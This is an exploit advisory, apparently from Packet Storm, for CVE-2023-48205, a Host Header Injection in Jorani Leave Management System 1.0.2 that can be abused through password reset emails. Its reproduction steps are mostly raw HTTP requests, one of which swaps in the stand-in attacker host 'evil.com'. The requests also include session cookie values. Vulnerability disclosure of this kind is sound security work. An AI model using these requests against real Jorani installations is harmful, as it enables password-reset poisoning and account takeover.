Share
## https://sploitus.com/exploit?id=PACKETSTORM:175802
# Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack  
# Date: 12/11/2023  
# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)  
# Vendor Homepage: https://jorani.org/  
# Software Link:  
https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip  
# Version: v1.0.2  
# Tested on: Windows 10, PHP version: 8.2.4, Apache/2.4.56  
# CVE: CVE-2023-48205  
  
Descriptions:  
A Host Header Injection vulnerability in Jorani Leave Management System  
1.0.2 may allow an attacker to spoof a particular header. This can be  
exploited by abusing password reset emails.  
  
  
Steps to Reproduce:  
  
1. Request:  
  
GET /jorani/session/login HTTP/1.1  
Host: 192.168.1.74  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8  
Sec-GPC: 1  
Accept-Language: en-US,en  
Accept-Encoding: gzip, deflate, br  
Cookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;  
jorani_session=pqop598dtj85okrjvh043es6pqp1juag  
Connection: close  
  
2. Now change host name and check browser response. So your request data  
will be:  
  
GET /jorani/session/login HTTP/1.1  
Host: evil.com  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8  
Sec-GPC: 1  
Accept-Language: en-US,en  
Accept-Encoding: gzip, deflate, br  
Cookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;  
jorani_session=pqop598dtj85okrjvh043es6pqp1juag  
Connection: close  
  
## Reproduce:  
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48205)